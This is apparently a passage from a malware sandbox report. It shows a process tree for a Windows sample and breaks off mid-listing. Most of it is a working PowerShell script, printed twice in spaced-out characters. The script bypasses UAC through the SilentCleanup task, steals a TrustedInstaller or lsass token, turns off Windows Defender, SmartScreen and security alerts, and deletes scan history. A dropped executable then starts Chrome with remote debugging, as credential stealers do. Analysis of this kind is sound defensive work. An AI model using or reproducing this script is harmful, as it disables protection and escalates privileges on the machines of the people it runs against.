 i f   ( $ ( s c . e x e   q c   w i n d e f e n d )   - l i k e   ' * T O G G L E * ' )   { $ T O G G L E = 7 ; $ K E E P = 6 ; $ A = ' E n a b l e ' ; $ S = ' O F F ' } e l s e { $ T O G G L E = 6 ; $ K E E P = 7 ; $ A = ' D i s a b l e ' ; $ S = ' O N ' }  
  
 i f   ( $ e n v : 1   - n e   6   - a n d   $ e n v : 1   - n e   7 )   {   $ e n v : 1 = $ T O G G L E   }  
  
 s t a r t   c m d   - a r g s   ' / d / r   S e c u r i t y H e a l t h S y s t r a y   &   " % P r o g r a m F i l e s % \ W i n d o w s   D e f e n d e r \ M S A S C u i L . e x e " '   - w i n   1  
  
 $ n o t i f = ' H K C U : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s \ C u r r e n t V e r s i o n \ N o t i f i c a t i o n s \ S e t t i n g s \ W i n d o w s . S y s t e m T o a s t . S e c u r i t y A n d M a i n t e n a n c e '  
 n i   $ n o t i f   - e a   0 | o u t - n u l l ;   r i   $ n o t i f . r e p l a c e ( ' S e t t i n g s ' , ' C u r r e n t ' )   - R e c u r s e   - F o r c e   - e a   0  
 s p   $ n o t i f   E n a b l e d   0   - T y p e   D w o r d   - F o r c e   - e a   0 ;   i f   ( $ T O G G L E   - e q   7 )   { r p   $ n o t i f   E n a b l e d   - F o r c e   - e a   0 }  
  
 $ t s = N e w - O b j e c t   - C o m O b j e c t   ' S c h e d u l e . S e r v i c e ' ;   $ t s . C o n n e c t ( ) ;   $ b a f f l i n g = $ t s . G e t F o l d e r ( ' \ M i c r o s o f t \ W i n d o w s \ D i s k C l e a n u p ' )  
 $ b p a s s = $ b a f f l i n g . G e t T a s k ( ' S i l e n t C l e a n u p ' ) ;   $ f l a w = $ b p a s s . D e f i n i t i o n  
  
 $ u = 0 ; $ w = w h o a m i   / g r o u p s ; i f ( $ w - l i k e ' * 1 - 5 - 3 2 - 5 4 4 * ' ) { $ u = 1 } ; i f ( $ w - l i k e ' * 1 - 1 6 - 1 2 2 8 8 * ' ) { $ u = 2 } ; i f ( $ w - l i k e ' * 1 - 1 6 - 1 6 3 8 4 * ' ) { $ u = 3 }  
  
 $ r = [ c h a r ] 1 3 ;   $ n f o = [ c h a r ] 3 9 + $ r + '   ( \       / ) ' + $ r + ' (   *   .   *   )     A   l i m i t e d   a c c o u n t   p r o t e c t s   y o u   f r o m   U A C   e x p l o i t s ' + $ r + '         ` ` ` ' + $ r + [ c h a r ] 3 9  
 $ s c r i p t = ' - n o p   - w i n   1   - c   &   { r p   h k c u : \ e n v i r o n m e n t   w i n d i r   - e a   0 ; $ A v e Y o = ' + $ n f o + ' ; $ e n v : 1 = ' + $ e n v : 1 ;   $ e n v : _ _ C O M P A T _ L A Y E R = ' I n s t a l l e r '  
 $ s c r i p t + = ' ; i e x ( ( g p   R e g i s t r y : : H K E Y _ U s e r s \ S - 1 - 5 - 2 1 * \ V o l a t i l e *   T o g g l e D e f e n d e r   - e a   0 ) [ 0 ] . T o g g l e D e f e n d e r ) } ' ;   $ c m d = ' p o w e r s h e l l   ' + $ s c r i p t  
  
 i f   ( $ u   - e q   0 )   {  
     s t a r t   p o w e r s h e l l   - a r g s   $ s c r i p t   - v e r b   r u n a s   - w i n   1 ;   b r e a k  
 }  
 i f   ( $ u   - e q   1 )   {  
     i f   ( $ f l a w . A c t i o n s . I t e m ( 1 ) . P a t h   - i n o t l i k e   ' * w i n d i r * ' ) { s t a r t   p o w e r s h e l l   - a r g s   $ s c r i p t   - v e r b   r u n a s   - w i n   1 ;   b r e a k }  
     s p   h k c u : \ e n v i r o n m e n t   w i n d i r   $ ( ' p o w e r s h e l l   ' + $ s c r i p t + '   # ' )  
     $ z = $ b p a s s . R u n E x ( $ n u l l , 2 , 0 , $ n u l l ) ;   $ w a i t = 0 ;   w h i l e ( $ b p a s s . S t a t e   - g t   3   - a n d   $ w a i t   - l t   1 7 ) { s l e e p   - m   1 0 0 ;   $ w a i t + = 0 . 1 }  
     i f ( g p   h k c u : \ e n v i r o n m e n t   w i n d i r   - e a   0 ) { r p   h k c u : \ e n v i r o n m e n t   w i n d i r   - e a   0 ; s t a r t   p o w e r s h e l l   - a r g s   $ s c r i p t   - v e r b   r u n a s   - w i n   1 } ; b r e a k  
 }  
 i f   ( $ u   - e q   2 )   {  
     $ A = [ A p p D o m a i n ] : : C u r r e n t D o m a i n . " D e f ` i n e D y n a m i c A s s e m b l y " ( 1 , 1 ) . " D e f ` i n e D y n a m i c M o d u l e " ( 1 ) ; $ D = @ ( ) ; 0 . . 5 | % { $ D + = $ A . " D e f ` i n e T y p e " ( ' A ' + $ _ ,  
     1 1 7 9 9 1 3 , [ V a l u e T y p e ] ) }   ; 4 , 5 | % { $ D + = $ D [ $ _ ] . " M a k ` e B y R e f T y p e " ( ) }   ; $ I = [ I n t 3 2 ] ; $ J = " I n t ` P t r " ; $ P = $ I . m o d u l e . G e t T y p e ( " S y s t e m . $ J " ) ;   $ F = @ ( 0 )  
     $ F + = ( $ P , $ I , $ P ) , ( $ I , $ I , $ I , $ I , $ P , $ D [ 1 ] ) , ( $ I , $ P , $ P , $ P , $ I , $ I , $ I , $ I , $ I , $ I , $ I , $ I , [ I n t 1 6 ] , [ I n t 1 6 ] , $ P , $ P , $ P , $ P ) , ( $ D [ 3 ] , $ P ) , ( $ P , $ P , $ I , $ I )  
     $ S = [ S t r i n g ] ;   $ 9 = $ D [ 0 ] . " D e f ` i n e P I n v o k e M e t h o d " ( ' C r e a t e P r o c e s s ' , " k e r n e l ` 3 2 " , 8 2 1 4 , 1 , $ I , @ ( $ S , $ S , $ I , $ I , $ I , $ I , $ I , $ S , $ D [ 6 ] , $ D [ 7 ] ) , 1 , 4 )  
     1 . . 5 | % { $ k = $ _ ; $ n = 1 ; $ F [ $ _ ] | % { $ 9 = $ D [ $ k ] . " D e f ` i n e F i e l d " ( ' f ' + $ n + + , $ _ , 6 ) } } ; $ T = @ ( ) ; 0 . . 5 | % { $ T + = $ D [ $ _ ] . " C r ` e a t e T y p e " ( ) ; $ Z = [ u i n t p t r ] : : s i z e  
     n v   ( ' T ' + $ _ ) ( [ A c t i v a t o r ] : : C r e a t e I n s t a n c e ( $ T [ $ _ ] ) ) } ;   $ H = $ I . m o d u l e . G e t T y p e ( " S y s t e m . R u n t i m e . I n t e r o p ` S e r v i c e s . M a r ` s h a l " ) ;  
     $ W P = $ H . " G e t ` M e t h o d " ( " W r i t e $ J " , [ t y p e [ ] ] ( $ J , $ J ) ) ;   $ H G = $ H . " G e t ` M e t h o d " ( " A l l o c H ` G l o b a l " , [ t y p e [ ] ] ' i n t 3 2 ' ) ;   $ v = $ H G . i n v o k e ( $ n u l l , $ Z )  
     ' T r u s t e d I n s t a l l e r ' , ' l s a s s ' | % { i f ( ! $ p n ) { n e t 1   s t a r t   $ _   2 > & 1   > $ n u l l ; $ p n = [ D i a g n o s t i c s . P r o c e s s ] : : G e t P r o c e s s e s B y N a m e ( $ _ ) [ 0 ] ; } }  
     $ W P . i n v o k e ( $ n u l l , @ ( $ v , $ p n . H a n d l e ) ) ;   $ S Z = $ H . " G e t ` M e t h o d " ( " S i z e O f " , [ t y p e [ ] ] ' t y p e ' ) ;   $ T 1 . f 1 = 1 3 1 0 7 2 ;   $ T 1 . f 2 = $ Z ;   $ T 1 . f 3 = $ v ;   $ T 2 . f 1 = 1  
     $ T 2 . f 2 = 1 ; $ T 2 . f 3 = 1 ; $ T 2 . f 4 = 1 ; $ T 2 . f 6 = $ T 1 ; $ T 3 . f 1 = $ S Z . i n v o k e ( $ n u l l , $ T [ 4 ] ) ; $ T 4 . f 1 = $ T 3 ; $ T 4 . f 2 = $ H G . i n v o k e ( $ n u l l , $ S Z . i n v o k e ( $ n u l l , $ T [ 2 ] ) )  
     $ H . " G e t ` M e t h o d " ( " S t r u c t u r e T o ` P t r " , [ t y p e [ ] ] ( $ D [ 2 ] , $ J , ' b o o l e a n ' ) ) . i n v o k e ( $ n u l l , @ ( ( $ T 2 - a s   $ D [ 2 ] ) , $ T 4 . f 2 , $ f a l s e ) ) ; $ w i n d o w = 0 x 0 E 0 8 0 6 0 0  
     $ 9 = $ T [ 0 ] . " G e t ` M e t h o d " ( ' C r e a t e P r o c e s s ' ) . I n v o k e ( $ n u l l , @ ( $ n u l l , $ c m d , 0 , 0 , 0 , $ w i n d o w , 0 , $ n u l l , ( $ T 4 - a s   $ D [ 4 ] ) , ( $ T 5 - a s   $ D [ 5 ] ) ) ) ;   b r e a k  
 }  
  
 $ w d p = ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s   D e f e n d e r '  
 '   S e c u r i t y   C e n t e r \ N o t i f i c a t i o n s ' , ' \ U X   C o n f i g u r a t i o n ' , ' \ M p E n g i n e ' , ' \ S p y n e t ' , ' \ R e a l - T i m e   P r o t e c t i o n '   | %   { n i   ( $ w d p + $ _ ) - e a   0 | o u t - n u l l }  
  
 s p   ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s   D e f e n d e r   S e c u r i t y   C e n t e r \ N o t i f i c a t i o n s '   D i s a b l e N o t i f i c a t i o n s   1   - T y p e   D w o r d   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s   D e f e n d e r \ U X   C o n f i g u r a t i o n '   N o t i f i c a t i o n _ S u p p r e s s   1   - T y p e   D w o r d   - F o r c e   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s   D e f e n d e r   S e c u r i t y   C e n t e r \ N o t i f i c a t i o n s '   D i s a b l e N o t i f i c a t i o n s   1   - T y p e   D w o r d   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s   D e f e n d e r \ U X   C o n f i g u r a t i o n '   N o t i f i c a t i o n _ S u p p r e s s   1   - T y p e   D w o r d   - F o r c e   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s \ S y s t e m '   E n a b l e S m a r t S c r e e n   0   - T y p e   D w o r d   - F o r c e   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s   D e f e n d e r '   D i s a b l e A n t i S p y w a r e   1   - T y p e   D w o r d   - F o r c e   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s   D e f e n d e r '   D i s a b l e A n t i S p y w a r e   1   - T y p e   D w o r d   - F o r c e   - e a   0  
 n e t 1   s t o p   w i n d e f e n d  
 s c . e x e   c o n f i g   w i n d e f e n d   d e p e n d =   R p c S s - T O G G L E  
 k i l l   - N a m e   M p C m d R u n   - F o r c e   - e a   0  
 s t a r t   ( $ e n v : P r o g r a m F i l e s + ' \ W i n d o w s   D e f e n d e r \ M p C m d R u n . e x e ' )   - A r g   ' - D i s a b l e S e r v i c e '   - w i n   1  
 d e l   ( $ e n v : P r o g r a m D a t a + ' \ M i c r o s o f t \ W i n d o w s   D e f e n d e r \ S c a n s \ m p e n g i n e d b . d b ' )   - F o r c e   - e a   0                       # #   C o m m e n t e d   =   k e e p   s c a n   h i s t o r y  
 d e l   ( $ e n v : P r o g r a m D a t a + ' \ M i c r o s o f t \ W i n d o w s   D e f e n d e r \ S c a n s \ H i s t o r y \ S e r v i c e ' )   - R e c u r s e   - F o r c e   - e a   0  
 ' @   - F o r c e   - e a   0 ;   i e x ( ( g p   R e g i s t r y : : H K E Y _ U s e r s \ S - 1 - 5 - 2 1 * \ V o l a t i l e *   T o g g l e D e f e n d e r   - e a   0 ) [ 0 ] . T o g g l e D e f e n d e r )  
 # - _ - # 
                                                                                                                                  6⤵
                                                                                                                                  • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                  PID:2788
                                                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                                                    "C:\Windows\system32\sc.exe" qc windefend
                                                                                                                                    7⤵
                                                                                                                                    • Launches sc.exe
                                                                                                                                    PID:4432
                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                    "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
                                                                                                                                    7⤵
                                                                                                                                      PID:1116
                                                                                                                                    • C:\Windows\system32\whoami.exe
                                                                                                                                      "C:\Windows\system32\whoami.exe" /groups
                                                                                                                                      7⤵
                                                                                                                                        PID:6224
                                                                                                                                      • C:\Windows\system32\net1.exe
                                                                                                                                        "C:\Windows\system32\net1.exe" start TrustedInstaller
                                                                                                                                        7⤵
                                                                                                                                          PID:6252
                                                                                                                                        • C:\Windows\system32\net1.exe
                                                                                                                                          "C:\Windows\system32\net1.exe" start lsass
                                                                                                                                          7⤵
                                                                                                                                            PID:6336
                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc @ ( e c h o   o f f % ) [ 1 ]  
 s p   ' H K C U : \ V o l a t i l e   E n v i r o n m e n t '   ' T o g g l e D e f e n d e r '   @ '  
 i f   ( $ ( s c . e x e   q c   w i n d e f e n d )   - l i k e   ' * T O G G L E * ' )   { $ T O G G L E = 7 ; $ K E E P = 6 ; $ A = ' E n a b l e ' ; $ S = ' O F F ' } e l s e { $ T O G G L E = 6 ; $ K E E P = 7 ; $ A = ' D i s a b l e ' ; $ S = ' O N ' }  
  
 i f   ( $ e n v : 1   - n e   6   - a n d   $ e n v : 1   - n e   7 )   {   $ e n v : 1 = $ T O G G L E   }  
  
 s t a r t   c m d   - a r g s   ' / d / r   S e c u r i t y H e a l t h S y s t r a y   &   " % P r o g r a m F i l e s % \ W i n d o w s   D e f e n d e r \ M S A S C u i L . e x e " '   - w i n   1  
  
 $ n o t i f = ' H K C U : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s \ C u r r e n t V e r s i o n \ N o t i f i c a t i o n s \ S e t t i n g s \ W i n d o w s . S y s t e m T o a s t . S e c u r i t y A n d M a i n t e n a n c e '  
 n i   $ n o t i f   - e a   0 | o u t - n u l l ;   r i   $ n o t i f . r e p l a c e ( ' S e t t i n g s ' , ' C u r r e n t ' )   - R e c u r s e   - F o r c e   - e a   0  
 s p   $ n o t i f   E n a b l e d   0   - T y p e   D w o r d   - F o r c e   - e a   0 ;   i f   ( $ T O G G L E   - e q   7 )   { r p   $ n o t i f   E n a b l e d   - F o r c e   - e a   0 }  
  
 $ t s = N e w - O b j e c t   - C o m O b j e c t   ' S c h e d u l e . S e r v i c e ' ;   $ t s . C o n n e c t ( ) ;   $ b a f f l i n g = $ t s . G e t F o l d e r ( ' \ M i c r o s o f t \ W i n d o w s \ D i s k C l e a n u p ' )  
 $ b p a s s = $ b a f f l i n g . G e t T a s k ( ' S i l e n t C l e a n u p ' ) ;   $ f l a w = $ b p a s s . D e f i n i t i o n  
  
 $ u = 0 ; $ w = w h o a m i   / g r o u p s ; i f ( $ w - l i k e ' * 1 - 5 - 3 2 - 5 4 4 * ' ) { $ u = 1 } ; i f ( $ w - l i k e ' * 1 - 1 6 - 1 2 2 8 8 * ' ) { $ u = 2 } ; i f ( $ w - l i k e ' * 1 - 1 6 - 1 6 3 8 4 * ' ) { $ u = 3 }  
  
 $ r = [ c h a r ] 1 3 ;   $ n f o = [ c h a r ] 3 9 + $ r + '   ( \       / ) ' + $ r + ' (   *   .   *   )     A   l i m i t e d   a c c o u n t   p r o t e c t s   y o u   f r o m   U A C   e x p l o i t s ' + $ r + '         ` ` ` ' + $ r + [ c h a r ] 3 9  
 $ s c r i p t = ' - n o p   - w i n   1   - c   &   { r p   h k c u : \ e n v i r o n m e n t   w i n d i r   - e a   0 ; $ A v e Y o = ' + $ n f o + ' ; $ e n v : 1 = ' + $ e n v : 1 ;   $ e n v : _ _ C O M P A T _ L A Y E R = ' I n s t a l l e r '  
 $ s c r i p t + = ' ; i e x ( ( g p   R e g i s t r y : : H K E Y _ U s e r s \ S - 1 - 5 - 2 1 * \ V o l a t i l e *   T o g g l e D e f e n d e r   - e a   0 ) [ 0 ] . T o g g l e D e f e n d e r ) } ' ;   $ c m d = ' p o w e r s h e l l   ' + $ s c r i p t  
  
 i f   ( $ u   - e q   0 )   {  
     s t a r t   p o w e r s h e l l   - a r g s   $ s c r i p t   - v e r b   r u n a s   - w i n   1 ;   b r e a k  
 }  
 i f   ( $ u   - e q   1 )   {  
     i f   ( $ f l a w . A c t i o n s . I t e m ( 1 ) . P a t h   - i n o t l i k e   ' * w i n d i r * ' ) { s t a r t   p o w e r s h e l l   - a r g s   $ s c r i p t   - v e r b   r u n a s   - w i n   1 ;   b r e a k }  
     s p   h k c u : \ e n v i r o n m e n t   w i n d i r   $ ( ' p o w e r s h e l l   ' + $ s c r i p t + '   # ' )  
     $ z = $ b p a s s . R u n E x ( $ n u l l , 2 , 0 , $ n u l l ) ;   $ w a i t = 0 ;   w h i l e ( $ b p a s s . S t a t e   - g t   3   - a n d   $ w a i t   - l t   1 7 ) { s l e e p   - m   1 0 0 ;   $ w a i t + = 0 . 1 }  
     i f ( g p   h k c u : \ e n v i r o n m e n t   w i n d i r   - e a   0 ) { r p   h k c u : \ e n v i r o n m e n t   w i n d i r   - e a   0 ; s t a r t   p o w e r s h e l l   - a r g s   $ s c r i p t   - v e r b   r u n a s   - w i n   1 } ; b r e a k  
 }  
 i f   ( $ u   - e q   2 )   {  
     $ A = [ A p p D o m a i n ] : : C u r r e n t D o m a i n . " D e f ` i n e D y n a m i c A s s e m b l y " ( 1 , 1 ) . " D e f ` i n e D y n a m i c M o d u l e " ( 1 ) ; $ D = @ ( ) ; 0 . . 5 | % { $ D + = $ A . " D e f ` i n e T y p e " ( ' A ' + $ _ ,  
     1 1 7 9 9 1 3 , [ V a l u e T y p e ] ) }   ; 4 , 5 | % { $ D + = $ D [ $ _ ] . " M a k ` e B y R e f T y p e " ( ) }   ; $ I = [ I n t 3 2 ] ; $ J = " I n t ` P t r " ; $ P = $ I . m o d u l e . G e t T y p e ( " S y s t e m . $ J " ) ;   $ F = @ ( 0 )  
     $ F + = ( $ P , $ I , $ P ) , ( $ I , $ I , $ I , $ I , $ P , $ D [ 1 ] ) , ( $ I , $ P , $ P , $ P , $ I , $ I , $ I , $ I , $ I , $ I , $ I , $ I , [ I n t 1 6 ] , [ I n t 1 6 ] , $ P , $ P , $ P , $ P ) , ( $ D [ 3 ] , $ P ) , ( $ P , $ P , $ I , $ I )  
     $ S = [ S t r i n g ] ;   $ 9 = $ D [ 0 ] . " D e f ` i n e P I n v o k e M e t h o d " ( ' C r e a t e P r o c e s s ' , " k e r n e l ` 3 2 " , 8 2 1 4 , 1 , $ I , @ ( $ S , $ S , $ I , $ I , $ I , $ I , $ I , $ S , $ D [ 6 ] , $ D [ 7 ] ) , 1 , 4 )  
     1 . . 5 | % { $ k = $ _ ; $ n = 1 ; $ F [ $ _ ] | % { $ 9 = $ D [ $ k ] . " D e f ` i n e F i e l d " ( ' f ' + $ n + + , $ _ , 6 ) } } ; $ T = @ ( ) ; 0 . . 5 | % { $ T + = $ D [ $ _ ] . " C r ` e a t e T y p e " ( ) ; $ Z = [ u i n t p t r ] : : s i z e  
     n v   ( ' T ' + $ _ ) ( [ A c t i v a t o r ] : : C r e a t e I n s t a n c e ( $ T [ $ _ ] ) ) } ;   $ H = $ I . m o d u l e . G e t T y p e ( " S y s t e m . R u n t i m e . I n t e r o p ` S e r v i c e s . M a r ` s h a l " ) ;  
     $ W P = $ H . " G e t ` M e t h o d " ( " W r i t e $ J " , [ t y p e [ ] ] ( $ J , $ J ) ) ;   $ H G = $ H . " G e t ` M e t h o d " ( " A l l o c H ` G l o b a l " , [ t y p e [ ] ] ' i n t 3 2 ' ) ;   $ v = $ H G . i n v o k e ( $ n u l l , $ Z )  
     ' T r u s t e d I n s t a l l e r ' , ' l s a s s ' | % { i f ( ! $ p n ) { n e t 1   s t a r t   $ _   2 > & 1   > $ n u l l ; $ p n = [ D i a g n o s t i c s . P r o c e s s ] : : G e t P r o c e s s e s B y N a m e ( $ _ ) [ 0 ] ; } }  
     $ W P . i n v o k e ( $ n u l l , @ ( $ v , $ p n . H a n d l e ) ) ;   $ S Z = $ H . " G e t ` M e t h o d " ( " S i z e O f " , [ t y p e [ ] ] ' t y p e ' ) ;   $ T 1 . f 1 = 1 3 1 0 7 2 ;   $ T 1 . f 2 = $ Z ;   $ T 1 . f 3 = $ v ;   $ T 2 . f 1 = 1  
     $ T 2 . f 2 = 1 ; $ T 2 . f 3 = 1 ; $ T 2 . f 4 = 1 ; $ T 2 . f 6 = $ T 1 ; $ T 3 . f 1 = $ S Z . i n v o k e ( $ n u l l , $ T [ 4 ] ) ; $ T 4 . f 1 = $ T 3 ; $ T 4 . f 2 = $ H G . i n v o k e ( $ n u l l , $ S Z . i n v o k e ( $ n u l l , $ T [ 2 ] ) )  
     $ H . " G e t ` M e t h o d " ( " S t r u c t u r e T o ` P t r " , [ t y p e [ ] ] ( $ D [ 2 ] , $ J , ' b o o l e a n ' ) ) . i n v o k e ( $ n u l l , @ ( ( $ T 2 - a s   $ D [ 2 ] ) , $ T 4 . f 2 , $ f a l s e ) ) ; $ w i n d o w = 0 x 0 E 0 8 0 6 0 0  
     $ 9 = $ T [ 0 ] . " G e t ` M e t h o d " ( ' C r e a t e P r o c e s s ' ) . I n v o k e ( $ n u l l , @ ( $ n u l l , $ c m d , 0 , 0 , 0 , $ w i n d o w , 0 , $ n u l l , ( $ T 4 - a s   $ D [ 4 ] ) , ( $ T 5 - a s   $ D [ 5 ] ) ) ) ;   b r e a k  
 }  
  
 $ w d p = ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s   D e f e n d e r '  
 '   S e c u r i t y   C e n t e r \ N o t i f i c a t i o n s ' , ' \ U X   C o n f i g u r a t i o n ' , ' \ M p E n g i n e ' , ' \ S p y n e t ' , ' \ R e a l - T i m e   P r o t e c t i o n '   | %   { n i   ( $ w d p + $ _ ) - e a   0 | o u t - n u l l }  
  
 s p   ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s   D e f e n d e r   S e c u r i t y   C e n t e r \ N o t i f i c a t i o n s '   D i s a b l e N o t i f i c a t i o n s   1   - T y p e   D w o r d   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s   D e f e n d e r \ U X   C o n f i g u r a t i o n '   N o t i f i c a t i o n _ S u p p r e s s   1   - T y p e   D w o r d   - F o r c e   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s   D e f e n d e r   S e c u r i t y   C e n t e r \ N o t i f i c a t i o n s '   D i s a b l e N o t i f i c a t i o n s   1   - T y p e   D w o r d   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s   D e f e n d e r \ U X   C o n f i g u r a t i o n '   N o t i f i c a t i o n _ S u p p r e s s   1   - T y p e   D w o r d   - F o r c e   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s \ S y s t e m '   E n a b l e S m a r t S c r e e n   0   - T y p e   D w o r d   - F o r c e   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s   D e f e n d e r '   D i s a b l e A n t i S p y w a r e   1   - T y p e   D w o r d   - F o r c e   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s   D e f e n d e r '   D i s a b l e A n t i S p y w a r e   1   - T y p e   D w o r d   - F o r c e   - e a   0  
 n e t 1   s t o p   w i n d e f e n d  
 s c . e x e   c o n f i g   w i n d e f e n d   d e p e n d =   R p c S s - T O G G L E  
 k i l l   - N a m e   M p C m d R u n   - F o r c e   - e a   0  
 s t a r t   ( $ e n v : P r o g r a m F i l e s + ' \ W i n d o w s   D e f e n d e r \ M p C m d R u n . e x e ' )   - A r g   ' - D i s a b l e S e r v i c e '   - w i n   1  
 d e l   ( $ e n v : P r o g r a m D a t a + ' \ M i c r o s o f t \ W i n d o w s   D e f e n d e r \ S c a n s \ m p e n g i n e d b . d b ' )   - F o r c e   - e a   0                       # #   C o m m e n t e d   =   k e e p   s c a n   h i s t o r y  
 d e l   ( $ e n v : P r o g r a m D a t a + ' \ M i c r o s o f t \ W i n d o w s   D e f e n d e r \ S c a n s \ H i s t o r y \ S e r v i c e ' )   - R e c u r s e   - F o r c e   - e a   0  
 ' @   - F o r c e   - e a   0 ;   i e x ( ( g p   R e g i s t r y : : H K E Y _ U s e r s \ S - 1 - 5 - 2 1 * \ V o l a t i l e *   T o g g l e D e f e n d e r   - e a   0 ) [ 0 ] . T o g g l e D e f e n d e r )  
 # - _ - # 
                                                                                                                                          6⤵
                                                                                                                                          • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                          PID:4580
                                                                                                                                          • C:\Windows\system32\sc.exe
                                                                                                                                            "C:\Windows\system32\sc.exe" qc windefend
                                                                                                                                            7⤵
                                                                                                                                            • Launches sc.exe
                                                                                                                                            PID:2868
                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                            "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
                                                                                                                                            7⤵
                                                                                                                                              PID:3396
                                                                                                                                            • C:\Windows\system32\whoami.exe
                                                                                                                                              "C:\Windows\system32\whoami.exe" /groups
                                                                                                                                              7⤵
                                                                                                                                                PID:6204
                                                                                                                                              • C:\Windows\system32\net1.exe
                                                                                                                                                "C:\Windows\system32\net1.exe" start TrustedInstaller
                                                                                                                                                7⤵
                                                                                                                                                  PID:6244
                                                                                                                                                • C:\Windows\system32\net1.exe
                                                                                                                                                  "C:\Windows\system32\net1.exe" start lsass
                                                                                                                                                  7⤵
                                                                                                                                                    PID:6312
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\10208390101\7KVoLQr.exe
                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\10208390101\7KVoLQr.exe"
                                                                                                                                            3⤵
                                                                                                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                            • Downloads MZ/PE file
                                                                                                                                            • Checks BIOS information in registry
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            • Identifies Wine through registry keys
                                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                            • Checks processor information in registry
                                                                                                                                            PID:1720
                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
                                                                                                                                              4⤵
                                                                                                                                              • Uses browser remote debugging
                                                                                                                                              • Enumerates system info in registry
                                                                                                                                              • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                                                                                              PID:464
                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7fff3572dcf8,0x7fff3572dd04,0x7fff3572dd10
                                                                                                                                                5⤵
                                                                                                                                                  PID:3560
                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2072,i,13166397040491620622,14894519733538319667,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=2068 /prefetch:2
                                                                                                                                                  5⤵
                                                                                                                                                    PID:5268
                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1560,i,13166397040491620622,14894519733538319667,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=2216 /prefetch:3
                                                                                                                                                    5⤵
                                                                                                                                                      PID:3368
                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2388,i,13166397040491620622,14894519733538319667,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=2536 /prefetch:8
                                                                                                                                                      5⤵
                                                                                                                                                        PID:4812
                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
